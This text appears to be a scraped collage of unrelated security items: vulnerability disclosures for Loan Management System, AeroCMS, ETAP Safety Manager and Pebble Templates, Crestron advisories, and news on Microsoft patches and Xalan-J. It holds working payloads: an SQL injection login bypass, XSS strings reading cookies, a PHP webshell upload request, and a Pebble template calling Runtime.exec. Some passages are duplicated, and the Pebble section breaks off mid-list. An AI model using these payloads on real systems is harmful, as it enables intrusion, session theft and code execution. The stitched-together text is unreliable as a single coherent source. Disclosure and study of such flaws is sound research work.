Loan Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

Permalink

**Loan Management System**

Loan Management System suffers from severals vulnerabilities which is SQL Injection and Stored Cross Site Scripting (XSS).

**CVE-2022-37138****1\. SQL Injection**

    # Exploit Title: Loan Management System - SQL Injection via login page
    # Date: 28/07/2022
    # Exploit Author: saitamang
    # Vendor Homepage: sourcecodester
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip
    # Version: 1.0
    # Tested on: Centos 7 apache2 + MySQL
    

The attack vector for the SQL Injection happened at the login page. The login can be bypass using the boolean payload below to gain access as Admin as the highest privileges.

Payload --> 'or 2=2#

The python script to get the database name from SQL Injection Vulnerability can be access here.

**CVE-2022-37139****2\. Stored Cross Site Scripting**

    # Exploit Title: Loan Management System - XSS Stored
    # Date: 28/07/2022
    # Exploit Author: saitamang
    # Vendor Homepage: sourcecodester
    # Software Link:
    https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip
    # Version: 1.0
    # Tested on: Centos 7 apache2 + MySQL
    

There are several functions and parameter affected as below:

    addUser.php
    - firstname
    - lastname
    
    save_ltype.php
    - ltype_name
    - ltype_desc
    
    save_borrower.php
    - firstname
    - middlename
    - lastname
    - address
    

The payload use to inject is "/><svg/onload=alert(document.cookie)>

CVE-2022-37139: POC-DUMP/README.md at main · saitamang/POC-DUMP

Tech giant Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks.
Of the 64 bugs, five are rated Critical, 57 are rated Important, one is rated Moderate, and one is rated Low in severity. The patches are in addition to 16 vulnerabilities that Microsoft addressed in its

Tech giant Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks.

Of the 64 bugs, five are rated Critical, 57 are rated Important, one is rated Moderate, and one is rated Low in severity. The patches are in addition to 16 vulnerabilities that Microsoft addressed in its Chromium-based Edge browser earlier this month.

"In terms of CVEs released, this Patch Tuesday may appear on the lighter side in comparison to other months," Bharat Jogi, director of vulnerability and threat research at Qualys, said in a statement shared with The Hacker News.

"However, this month hit a sizable milestone for the calendar year, with MSFT having fixed the 1000th CVE of 2022 – likely on track to surpass 2021 which patched 1,200 CVEs in total."

The actively exploited vulnerability in question is CVE-2022-37969 (CVSS score: 7.8), a privilege escalation flaw affecting the Windows Common Log File System (CLFS) Driver, which could be leveraged by an adversary to gain SYSTEM privileges on an already compromised asset.

"An attacker must already have access and the ability to run code on the target system. This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system," Microsoft said in an advisory.

The tech giant credited four different sets of researchers from CrowdStrike, DBAPPSecurity, Mandiant, and Zscaler for reporting the flaw, which may be an indication of widespread exploitation in the wild, Greg Wiseman, product manager at Rapid7, said in a statement.

CVE-2022-37969 is also the second actively exploited zero-day flaw in the CLFS component after CVE-2022-24521 (CVSS score: 7.8), the latter of which was resolved by Microsoft as part of its April 2022 Patch Tuesday updates.

It's not immediately clear if CVE-2022-37969 is a patch bypass for CVE-2022-24521. Other critical flaws of note are as follows -

*   **CVE-2022-34718** (CVSS score: 9.8) - Windows TCP/IP Remote Code Execution Vulnerability
*   **CVE-2022-34721** (CVSS score: 9.8) - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
*   **CVE-2022-34722** (CVSS score: 9.8) - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
*   **CVE-2022-34700** (CVSS score: 8.8) - Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability
*   **CVE-2022-35805** (CVSS score: 8.8) - Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability

"An unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation," Microsoft said about CVE-2022-34721 and CVE-2022-34722.

Also resolved by Microsoft are 15 remote code execution flaws in Microsoft ODBC Driver, Microsoft OLE DB Provider for SQL Server, and Microsoft SharePoint Server and five privilege escalation bugs spanning Windows Kerberos and Windows Kernel.

The September release is further notable for patching yet another elevation of privilege vulnerability in the Print Spooler module (CVE-2022-38005, CVSS score: 7.8) that could be abused to obtain SYSTEM-level permissions.

Lastly, included in the raft of security updates is a fix released by chipmaker Arm for a speculative execution vulnerability called Branch History Injection or Spectre-BHB (CVE-2022-23960) that came to light earlier this March.

"This class of vulnerabilities poses a large headache to the organizations attempting mitigation, as they often require updates to the operating systems, firmware and in some cases, a recompilation of applications and hardening," Jogi said. "If an attacker successfully exploits this type of vulnerability, they could gain access to sensitive information."

**Software Patches from Other Vendors**

Aside from Microsoft, security updates have also been released by other vendors since the start of the month to rectify dozens of vulnerabilities, including —

*   Adobe
*   Android
*   Apache Projects
*   Apple
*   Cisco
*   Citrix
*   Dell
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   NVIDIA
*   Qualcomm
*   Samba
*   SAP
*   Schneider Electric
*   Siemens
*   Trend Micro
*   VMware, and
*   WordPress (which is dropping support for versions 3.7 through 4.0 starting December 1, 2022)

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft's Latest Security Update Fixes 64 New Flaws, Including a Zero-Day

AeroCMS v0.0.1 was discovered to contain an arbitrary file upload vulnerability via the component /admin/profile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Hello I want to report an arbitrary file upload vulnerability that I found in AeroCms v0.0.1, through which we can upload webshell and control the web server.

**Step to Reproduct**

After entering the background of website management, click "Profile" to enter the interface of "/admin/profile. PHP", and you can see that the function of uploading pictures exists.  

We create a new webshell file and name it shell.php ：

<?php phpinfo(); ?>

Next, we select the file and click "Updae Profile" to upload the file  

When upload success access **'/images/shell.php'**

**We can see that the file was successfully uploaded and executed**

**Vulnerable Code**

**No file checking before uploading**

**POC**

**Injection Point**

> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_image"; filename="shell.php"  
> Content-Type: image/jpeg

**Request**

> POST /admin/profile.php HTTP/1.1  
> Host: 127.0.0.1:8080  
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8  
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
> Accept-Encoding: gzip, deflate  
> Content-Type: multipart/form-data; boundary=---------------------------423983190532431556521178267050  
> Content-Length: 1109  
> Origin: http://127.0.0.1:8080  
> Connection: close  
> Referer: http://127.0.0.1:8080/admin/profile.php  
> Cookie: PHPSESSID=dh3hq98sqsj0eapgn43efegfb3  
> Upgrade-Insecure-Requests: 1
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="username"
> 
> 1111  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="password"
> 
> 123.com  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_firstname"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_lastname"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_email"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_image"; filename="shell.php"  
> Content-Type: image/jpeg
> 
> test is test
> 
> <?php phpinfo();?>  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_role"
> 
> Subscriber  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="update\_user"
> 
> Update Profile  
> \-----------------------------423983190532431556521178267050--

**response**

> HTTP/1.1 200 OK  
> Date: Wed, 10 Aug 2022 02:45:01 GMT  
> Server: Apache/2.4.10 (Debian)  
> Expires: Thu, 19 Nov 1981 08:52:00 GMT  
> Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
> Pragma: no-cache  
> Vary: Accept-Encoding  
> Content-Length: 8474  
> Connection: close  
> Content-Type: text/html; charset=UTF-8
> 
>     <meta charset="utf-8">
>     <meta http-equiv="X-UA-Compatible" content="IE=edge">
>     <meta name="viewport" content="width=device-width, initial-scale=1">
>     <meta name="description" content="">
>     <meta name="author" content="">
>     
>     <title>AeroCMS Admin Panel</title>
>     
>     
>     <link href="css/bootstrap.min.css" rel="stylesheet">
>     
>     
>     <link href="css/sb-admin.css" rel="stylesheet">
>     
>     
>     <link href="font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
>     
>     
>     
>     
>     
>     <link rel="stylesheet" href="css/styles.css">
>     
>     <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
>     
>     <script src="https://cloud.tinymce.com/stable/tinymce.min.js"></script>
>     
>     <script src="js/jquery.js"></script>
>     
> 
>     <div id="wrapper">
>     
>         
>         <nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
>             
>             <div class="navbar-header">
>                 <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
>                     <span class="sr-only">Toggle navigation</span>
>                     <span class="icon-bar"></span>
>                     <span class="icon-bar"></span>
>                     <span class="icon-bar"></span>
>                 </button>
>                 <a class="navbar-brand" href="index.php">AeroCMS</a>
>             </div>
>             
>             <ul class="nav navbar-right top-nav">
>                 
>                 <li><a href='#'>Users Online: <span class="usersonline"></span></a></li>
>                 <li><a href="../index.php">View Site</a></li>
>                 
>                 <li class="dropdown">
>                     <a href="#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-user"></i>  <b class="caret"></b></a>
>                     <ul class="dropdown-menu">
>                         <li>
>                             <a href="#"><i class="fa fa-fw fa-user"></i> Profile</a>
>                         </li>
>                         <li class="divider"></li>
>                         <li>
>                             <a href="../includes/logout.php"><i class="fa fa-fw fa-power-off"></i> Log Out</a>
>                         </li>
>                     </ul>
>                 </li>
>             </ul>
>             
>             <div class="collapse navbar-collapse navbar-ex1-collapse">
>                 <ul class="nav navbar-nav side-nav">
>                     <li>
>                         <a href="index.php"><i class="fa fa-fw fa-dashboard"></i> Dashboard</a>
>                     </li>
>                     
>                     <li>
>                         <a href="javascript:;" data-toggle="collapse" data-target="#posts_dropdown"><i class="fa fa-fw fa-arrows-v"></i> Posts <i class="fa fa-fw fa-caret-down"></i></a>
>                         <ul id="posts_dropdown" class="collapse">
>                             <li>
>                                 <a href="./posts.php">View All Posts</a>
>                             </li>
>                             <li>
>                                 <a href="./posts.php?source=add_post">Add Posts</a>
>                             </li>
>                         </ul>
>                     </li>
>     
>                     <li>
>                         <a href="./categories.php"><i class="fa fa-fw fa-wrench"></i> Categories</a>
>                     </li>
>     
>                     <li>
>                         <a href="./comments.php"><i class="fa fa-fw fa-file"></i> Comments</a>
>                     </li>
>                     <li>
>                         <a href="javascript:;" data-toggle="collapse" data-target="#users"><i class="fa fa-fw fa-arrows-v"></i> Users <i class="fa fa-fw fa-caret-down"></i></a>
>                         <ul id="users" class="collapse">
>                             <li>
>                                 <a href="./users.php">View All Users</a>
>                             </li>
>                             <li>
>                                 <a href="./users.php?source=add_user">Add User</a>
>                             </li>
>                         </ul>
>                     </li>
>                     <li>
>                         <a href="./profile.php"><i class="fa fa-fw fa-file"></i> Profile</a>
>                     </li>
>                 </ul>
>             </div>
>             
>         </nav>
>     
>         <div id="page-wrapper">
>     
>             <div class="container-fluid">
>     
>                 
>                 <div class="row">
>                     <div class="col-lg-12">
>                         <h1 class="page-header">
>                             Welcome to the Admin Panel,
>                             <small>!</small>
>                         </h1>
>     
>                         <form action="" method="post" enctype="multipart/form-data">
>     
>                             <div class="form-group">
>                                     <label for="username">Username</label>
>                                     <input type="text" name="username" value="1111" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                     <label for="password">Password</label>
>                                     <input type="password" name="password" value="123.com" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_firstname">Firstname</label>
>                                 <input type="text" name="user_firstname" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_lastname">Lastname</label>
>                                 <input type="text" name="user_lastname" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_email">Email</label>
>                                 <input type="email" name="user_email" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_image">Image</label>
>                                 <img class="img-responsive" width="200" src="../images/test2.php" alt="">
>                                 <input type="file" name="user_image" class="form-control">
>                             </div>
>     
>     
>                             <div class="form-group">
>                                 <select name="user_role" class="form-control">
>                                     <option value="Subscriber">Subscriber</option>
>                                 
>                                 <option value='Admin'>Admin</option>                                    
>                                     
>                                     
>                                 </select>
>     
>                             </div>
>     
>                             <div class="form-group">
>                                 <input type="submit" value="Update Profile" name="update_user" class="btn btn-primary">
>                             </div>
>     
>                         </form>
>     
>     
>                     </div>
>                 </div>
>                 
>     
>             </div>
>             
>     
>         </div>
>         
>     
>     </div>
>     
>     
> 
> <script src="js/scripts.js"></script>

**I hope you can fix this vulnerability as soon as possible. I will report this vulnerability to CVE. Looking forward to your reply**

CVE-2022-38305: An arbitrary file upload vulnerability was found · Issue #3 · MegaTKC/AeroCMS

Insufficient access control vulnerability was discovered in the Crestron AirMedia Windows Application, version 4.3.1.39, in which a user can pause the uninstallation of an executable to gain a SYSTEM level command prompt.

CVE-2022-34100: AirMedia Binary Hijack

09/09/22

More information

Threat:

The Lockheed Martin Red Team has discovered a vulnerability found in the AirMedia Windows Application, version 4.3.1.39, in which a low-privileged user can gain a SYSTEM level command prompt by pre-staging a file structure prior to the installation of a trusted service executable and change permissions on that file structure during a repair operation.

Identifier:

CVE-2022-34100

How is Crestron Affected:

Please update the AirMedia Deployable and Guest Application to version 5.5.1.87 to resolve this issue

CVE-2022-34101: AirMedia Rogue DLL

09/09/22

More information

Threat:

The Lockheed Martin Red Team has discovered a vulnerability found in the AirMedia Windows Application, version 4.3.1.39, in which a user can place a malicious DLL in a certain path to execute code and preform a privilege escalation attack.

Identifier:

CVE-2022-34101

How is Crestron Affected:

Please update the AirMedia Deployable and Guest Applications to version 5.5.1.87 to resolve this issue.

CVE-2022-34102: AirMedia Command Prompt Hijack

09/09/22

More information

Threat:

The Lockheed Martin Red Team has discovered a vulnerability found in the AirMedia Windows Application, version 4.3.1.39, in which a user can pause the uninstallation of an executable to gain a SYSTEM level command prompt.

Identifier:

CVE-2022-34102

How is Crestron Affected:

Please update the Air Media Deployable and Guest Applications to version 5.5.1.87 to resolve this issue.

CVE-2022-22707: Lighttpd Denial-of-Service

05/17/22

More information

Threat:

Crestron is aware of an issue affecting lighttpd versions 1.4.46 through 1.4.63. Under certain non-default configurations, an attacker can perform a remote denial of service attack with a stack-based buffer overflow.

Identifier:

CVE-2022-22707

How is Crestron Affected:

Crestron devices are not affected because they do not utilize the vulnerable configurations.

CVE-2022-22965: Spring4Shell

03/31/22

More information

Threat:

This vulnerability impacts Spring MVC and Spring WebFlux applications running on JDK 9+. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.

How is Crestron Affected:

Crestron products do not make use of this framework and as such are not vulnerable.

Resources:

https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement  
 

CVE-2022-23178: Web Interface Credentials in Cleartext

01/24/22

More information

Threat:

Crestron is aware of an issue discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.

Identifier:

CVE-2022-23178

How is Crestron Affected:

This vulnerability affects the following products:

*   HD-MD4x1-4K-E
*   HD-MD4x2-4K-E
*   HD-MD6x2-4K-E

Crestron recommends placing the devices on an isolated network.  
Note that the following (4KZ) models are NOT affected by this vulnerability and can be used in place of the affected products.

*   HD-MD4x1-4KZ-E
*   HD-MD4x2-4KZ-E
*   HD-MD6x2-4KZ-E

CVE-2018-15473: OpenSSH User Enumeration

01/12/22

More information

Threat:

Crestron is aware of OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.  
 

Identifier:

This vulnerability has been assigned CVE identifier CVE-2018-15473.

How is Crestron Affected:

This vulnerability affects the following products: All 3-Series Control Systems including but not limited to CP3, RMC3, CP3N, PRO3, and all "x52 Series touchscreens" including but not limited to TSW-552, TSW-1052, TSW-752, TSS-752

Crestron 3-Series Control Systems now uses a customized version of OpenSSH. The Crestron version was modified to replace the cryptographic functions with NIST certified alternatives as well as to remove/modify vulnerable components. Crestron continues to monitor OpenSSH vulnerabilities to apply appropriate fixes.

While the TSW and TSS panels noted use OpenSSH 7.5, they don’t support the features related to this vulnerability. Due to these circumstances, Crestron is not susceptible. Newer touchscreens use a later version of OpenSSH which is not susceptible.

Resources:

For more information, please see 3-Series Control System release notes: v.1.601.0050

Apache Log4j

12/15/21

More information

Threat:

From the offiical vulnerability registration: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. It was later found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. 

Identifier:

CVE-2021-44228, CVE-2021-4104, CVE-2021-45046

How is Crestron Affected:

Crestron has completed a review of all its products and services and have found none which use Log4j and therefore none are affected by this vulnerability.

Resources:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046  
 

NUCLEUS:13

11/09/21

More information

Threat:

A set of vulnerabilities related to the Nucleus Operating System were disclosed by Siemens on November 9, 2021. The official report can be found here and the researcher’s findings can be found here.  
These vulnerabilities have been assigned the following CVEs.

*   CVE-2021-31344 - ICMP echo packets with fake IP options allow sending ICMP echo reply messages to arbitrary hosts on the network.
*    CVE-2021-31345 - The total length of an UDP payload (set in the IP header) is unchecked. This may lead to various side effects, including Information Leak and Denial-of-Service conditions, depending on a user-defined applications that runs on top of the UDP protocol.
*   CVE-2021-31346 - The total length of an ICMP payload (set in the IP header) is unchecked. This may lead to various side effects, including Information Leak and Denial-of-Service conditions, depending on the network buffer organization in memory.
*   CVE-2021-31881\- When processing a DHCP OFFER message, the DHCP client application does not validate the length of the Vendor option(s), leading to Denial-of-Service conditions.
*   CVE-2021-31882 - The DHCP client application does not validate the length of the Domain Name Server IP option(s) (0x06) when processing DHCP ACK packets. This may lead to Denial-of-Service conditions.
*   CVE-2021-31883 - When processing a DHCP ACK message, the DHCP client application does not validate the length of the Vendor option(s), leading to Denial-of-Service conditions.
*   CVE-2021-31884 - The DHCP client application assumes that the data supplied with the “Hostname” DHCP option is NULL terminated. In cases when global hostname variable is not defined, this may lead to Out-of-bound reads, writes, and Denial-of-service conditions.
*   CVE-2021-31885 - TFTP server application allows for reading the contents of the TFTP memory buffer via sending malformed TFTP commands.
*   CVE-2021-31886 - FTP server does not properly validate the length of the “USER” command, leading to stack-based buffer overflows. This may result in Denial-of-Service conditions and Remote Code Execution.
*   CVE-2021-31887 - FTP server does not properly validate the length of the “PWD/XPWD” command, leading to stack-based buffer overflows. This may result in Denial-of-Service conditions and Remote Code Execution.
*   CVE-2021-31888 - FTP server does not properly validate the length of the “MKD/XMKD” command, leading to stack-based buffer overflows. This may result in Denial-of-Service conditions and Remote Code Execution.
*   CVE-2021-31889 - Malformed TCP packets with a corrupted SACK option leads to Information Leaks and Denial-of-Service conditions.
*   CVE-2021-31890 - The total length of an TCP payload (set in the IP header) is unchecked. This may lead to various side effects, including Information Leak and Denial-of-Service conditions, depending on the network buffer organization in memory.

Identifier:

2021-31885, 2021-31886, 2021-31887, 2021-31888, 2021-31881, 2021-31882, 2021-31883, 2021-31884, 2021-31344, 2021-31345, 2021-31346, 2021-31889, 2021-31890

How is Crestron Affected:

Crestron has reviewed products utilizing Nucleus and has found none of its products to be affected.

For reference, a partial list of Crestron products utilizing Nucleus follows:

*   2-Series Control Processors – most of these products are discontinued with the notable exceptions of the GLPAC and GL-IPAC
*   DM-MD6X4 and DM-MD6X6
*   DMC-CPU-8/16
*   DMPS3-300-C and DMPS3-300-C-AEC - (Used on Internal Components only - no direct network access)
*   SWAMP and related products
*   CEN-TRACK

Resources:

https://www.forescout.com/research-labs/nucleus-13/  
https://www.siemens.com/cert/advisories

direct link to

*   pdf: https://cert-portal.siemens.com/productcert/pdf/ssa-044112.pdf
*   txt: https://cert-portal.siemens.com/productcert/txt/ssa-044112.txt
*   csaf: https://cert-portal.siemens.com/productcert/csaf/ssa-044112.json

ThroughTek's Kalay Platform

08/25/21

More information

Threat:

There is a critical vulnerability that has been discovered that affects the IoT devices that use ThroughTek’s “Kalay” network. Exploiting this vulnerability allows the attacker to listen to live audio, watch real time video data and compromise the credentials on the device for further attacks. This can let the attacker remotely control the device.  
 

Identifier:

This vulnerability has been assigned CVE identifier CVE-2021-28372

How is Crestron Affected:

This vulnerability has no impact on Crestron devices as they do not use the ThroughTek “Kalay” network.  
 

|<  <   **1** 2 3 4 5 6    \>  \>| Pages: 1 of 6

CVE-2022-34102: Crestron Electronics, Inc.

ETAP Safety Manager version 1.0.0.32 suffers from a cross site scripting vulnerability.

    ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSSVendor: ETAP Lighting International NVProduct web page: https://www.etaplighting.comAffected version: 1.0.0.32Summary: The ETAP Safety Manager (ESM) is a central managing and controlsystem that helps you to monitor, adjust and maintain your emergency lightingsystem. Therefore each luminaire connected to your ESM network is given aunique code. The ESM can easily identify the luminaires individually andautomatically report whether all luminaires work properly. You can eitherchoose between a wired or wireless network, or a combination of both. WithESM you will not only manage your self contained or your centrally supplied‘ETAP Battery System’ (EBS) emergency luminaires’, but also DALI emergencyunits and K9 LED modules, which you can build into your luminaires. Sinceyour ESM system is connected to the Internet, you will always have accessto it through the World Wide Web. ESMweb™ is an ‘embedded web server’application for monitoring an emergency lighting system, which runs in the‘ESM web controller’. The ESMweb™ application can be accessed from any PCin the corporate network or connected to the Internet - by a standard webbrowser.Desc: Input passed to the GET parameter 'action' is not properly sanitisedbefore being returned to the user. This can be exploited to execute arbitraryHTML/JS code in a user's browser session in context of an affected site.Tested on: Apache/2.4.41 (Ubuntu)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5711Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5711.php22.08.2022--PoC:GET /json/authenticate.php?action=[XSS]&username=waddup&password=nm HTTP/1.1{"success":false,"errorMessage":"Invalid command: $","errorCode":0,"errorInfo":"\/var\/www\/etap-root\/scripts\/class.dispatch.php(39)","rows":[]}

ETAP Safety Manager 1.0.0.32 Cross Site Scripting

Open source project is used by various SAML implementations

Jessica Haworth 12 September 2022 at 14:46 UTC

Open source project is used by various SAML implementations

  

A vulnerability in Xalan-J, an Apache project used by multiple SAML implementations, could allow arbitrary code execution, researchers warn.

XSLT (Extensible Stylesheet Language Transformations) is a markup language that can transform XML documents into other formats, such as HTML.

Xalan-J is a Java version implementation of an XSLT processor.

The project is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets, discovered by Google Project Zero’s Felix Wilhelm.

Read more of the latest news about web security vulnerabilities

This issue can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode, he warned, allowing for arbitrary code execution in software using Xalan-J for processing untrusted XSLT stylesheets.

As Xalan-J is used for performing XSLT transformations during XML signature verification in OpenJDK, this bug potentially affects a large number of Java-based SAML implementations, Wilhelm warned.

SAML is a method of authentication that enables a user to access multiple web applications using one set of login credentials.

**Mitigations**

The researcher noted that XSLT support for XML signatures can be disabled using the property, however the default value for applications running without a SecurityManager was false until JDK 17, “so I would expect a lot of implementations to be vulnerable to this”.

In a blog post published in August, Wilhelm said that he was able to write a Proof-of-Concept (PoC) exploit for this bug “that generates a valid (but useless) class file that’s almost completely controlled by the attacker”.

He continued: “While I haven’t successfully executed my own bytecode yet I’m very confident that this is possible with a bit more time investment, so I am reporting this issue now and may follow-up with a more complete proof-of-concept at a later stage.”

Another researcher has since produced their own PoC for the vulnerability, more details of which can be found on GitHub.

The vulnerability has since been fixed in OpenJDK, the open source implementation of the Java Standard Edition (Java SE) and Java Development Kit (JDK).

Wilhelm notes that it has not been fixed in Apache’s version, which is being retired.

RECOMMENDED ManageEngine vulnerability posed code injection risk for password management software

Vulnerability in Xalan-J could allow arbitrary code execution

Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springbok

**Pebble 3.1.5 Bypass**

Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springboot，Here is my report.

First, simply set up an environment with the official documentation：https://pebbletemplates.io/

Pom.xml

<?xml version\="1.0" encoding\="UTF-8"?>
<project xmlns\="http://maven.apache.org/POM/4.0.0" xmlns:xsi\="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation\="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"\>
    <modelVersion\>4.0.0</modelVersion\>
    <parent\>
        <groupId\>org.springframework.boot</groupId\>
        <artifactId\>spring-boot-starter-parent</artifactId\>
        <version\>2.7.2</version\>
        <relativePath/> 
    </parent\>
    <groupId\>com.example</groupId\>
    <artifactId\>hackingpebble</artifactId\>
    <version\>0.0.1-SNAPSHOT</version\>
    <name\>hackingpebble</name\>
    <description\>hackingpebble</description\>
    <properties\>
        <java.version>1.8</java.version>
    </properties\>
    <dependencies\>
        <dependency\>
            <groupId\>org.springframework.boot</groupId\>
            <artifactId\>spring-boot-starter-web</artifactId\>
        </dependency\>
        <dependency\>
            <groupId\>io.pebbletemplates</groupId\>
            <artifactId\>pebble-spring-boot-starter</artifactId\>
            <version\>3.1.5</version\>
        </dependency\>

        <dependency\>
            <groupId\>org.springframework.boot</groupId\>
            <artifactId\>spring-boot-starter-test</artifactId\>
            <scope\>test</scope\>
        </dependency\>
    </dependencies\>

    <build\>
        <plugins\>
            <plugin\>
                <groupId\>org.springframework.boot</groupId\>
                <artifactId\>spring-boot-maven-plugin</artifactId\>
            </plugin\>
        </plugins\>
    </build\>

</project\>

com.example.hackingpebble.HackingpebbleApplication.java

package com.example.hackingpebble;

import com.mitchellbosecke.pebble.PebbleEngine;
import com.mitchellbosecke.pebble.loader.Loader;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;

@SpringBootApplication
public class HackingpebbleApplication {

    public static void main(String\[\] args) {
        SpringApplication.run(HackingpebbleApplication.class, args);
    }

}

com.example.hackingpebble.controller.Test.java

package com.example.hackingpebble.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;

@Controller
public class Test {

    @RequestMapping({"/"})
    public String getTemplate(@RequestParam String template) {
        return template;

    }

}

application.properties

pebble.prefix = templates
pebble.suffix = .pebble

And file structure as follows:  

When we control the parameter template we can render back the specified template file.

In previous versions, in order to mitigate command execution caused by malicious content in the template，pebble introduces a new security mechanism, which is implemented through the class BlacklistMethodAccessValidator.

In this class you can see a lot of restrictions, on the one hand, restricting the class to be an instance of certain classes, and on the other hand, restricting the execution of some methods

public class BlacklistMethodAccessValidator implements MethodAccessValidator {
    private static final String\[\] FORBIDDEN\_METHODS = new String\[\]{"getClass", "wait", "notify", "notifyAll"};

    public BlacklistMethodAccessValidator() {
    }

    public boolean isMethodAccessAllowed(Object object, Method method) {
        boolean methodForbidden = object instanceof Class || object instanceof Runtime || object instanceof Thread || object instanceof ThreadGroup || object instanceof System || object instanceof AccessibleObject || this.isUnsafeMethod(method);
        return !methodForbidden;
    }

    private boolean isUnsafeMethod(Method member) {
        return this.isAnyOfMethods(member, FORBIDDEN\_METHODS);
    }

    private boolean isAnyOfMethods(Method member, String... methods) {
        String\[\] var3 = methods;
        int var4 = methods.length;

        for(int var5 = 0; var5 < var4; ++var5) {
            String method = var3\[var5\];
            if (this.isMethodWithName(member, method)) {
                return true;
            }
        }

        return false;
    }

    private boolean isMethodWithName(Method member, String method) {
        return member.getName().equals(method);
    }
}

Look at the old version of exploit, loading any class by Class.forName，now，no class

{% set cmd = 'id' %}
{% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods\[6\]
     .invoke(null,null)
     .exec(cmd) %}

What can we do? So far we know that many instances of Spring applications are implicitly registered as beans, so can we find an object from a bean that holds a classloader object, and by getting it we can load any object by executing loadClass

By debugging we can easily export these beans objects

So we have to find some eligible beans among these classes

org.springframework.context.annotation.internalConfigurationAnnotationProcessor
org.springframework.context.annotation.internalAutowiredAnnotationProcessor
org.springframework.context.annotation.internalCommonAnnotationProcessor
org.springframework.context.event.internalEventListenerProcessor
org.springframework.context.event.internalEventListenerFactory
hackingpebbleApplication
org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory
test
org.springframework.boot.autoconfigure.AutoConfigurationPackages
org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration
propertySourcesPlaceholderConfigurer
org.springframework.boot.autoconfigure.websocket.servlet.WebSocketServletAutoConfiguration$TomcatWebSocketConfiguration
websocketServletWebServerCustomizer
